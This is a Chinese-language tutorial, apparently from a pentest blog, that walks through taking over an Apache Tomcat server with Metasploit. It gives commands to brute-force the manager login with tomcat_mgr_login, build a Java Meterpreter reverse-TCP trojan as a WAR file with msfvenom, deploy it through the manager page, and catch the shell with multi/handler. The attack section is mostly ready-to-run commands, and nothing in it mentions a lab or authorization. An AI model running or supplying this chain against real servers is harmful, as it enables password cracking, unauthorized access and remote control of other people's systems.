msf爆破tomcat

Tomcat是一款Apache下面的开源的Servlet容器,实现了对Servlet和JSP规范的支持。另外 Tomcat 本身内含了一个 HTTP 服务器,所以也可以被当作一个 Web 服务器来使用。但是Tomcat作为一个Web服务器,它对静态资源的处理能力要比Apache或者Nginx这类的Web服务器差很多,所以我们经常将Apache和Tomcat(或者是Nginx和Tomcat)组合使用,Apache来充当Web服务器处理静态资源的请求,Tomcat充当Servlet容器来处理动态请求。

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。

image-20230804190245109

image-20230726121534414

步骤

  • 找到后台管理界面
  • 使用 auxiliary/scanner/http/tomcat_mgr_login 模块爆破后台密码
  • 利用msf毒液制作java木马: msfvenom -p java/meterpreter/reverse_tcp lhost=x.x.x.x lport=x -f war -o kali.war
  • 利用tomcat管理后台上传java木马

找到后台管理界面

确认ip地址、端口

image-20230726120008190

使用tomcat后台爆破模块爆破后台登录密码

1
2
3
4
5
6
use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts x.x.x.x
set threads 10
set bruteforce_speed 5
run

image-20230726120642964

show options 查看待设置参数时留意用户名字典和密码字典。可以根据实际情况自己更换。

爆破结果需要自己翻找

image-20230726120847727

利用爆破出来的用户名密码登录tomcat后台管理界面

image-20230726120950196

找到上传点

image-20230726121534414

image-20230726121403095

使用msf毒液(msfvenom)制作木马

1
msfvenom -p java/meterpreter/reverse_tcp lhost=x.x.x.x lport=xxxx -f war -o kali.war

制作木马文件kali.war

image-20230726141941904

使用handler模块监听端口等待连接

1
2
3
4
5
6
use exploit/multi/handler
show options
set payload java/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxxx
exploit

image-20230726143540104

tomcat后台部署上传的木马

部署应用

image-20230726143718287

点击访问

image-20230726143758363

handler模块监听到目标连接

image-20230726143918781

查看目标信息

1
2
getuid
sysinfo

image-20230726144139431

接下来就可以利用meterpreter进行进一步的操作了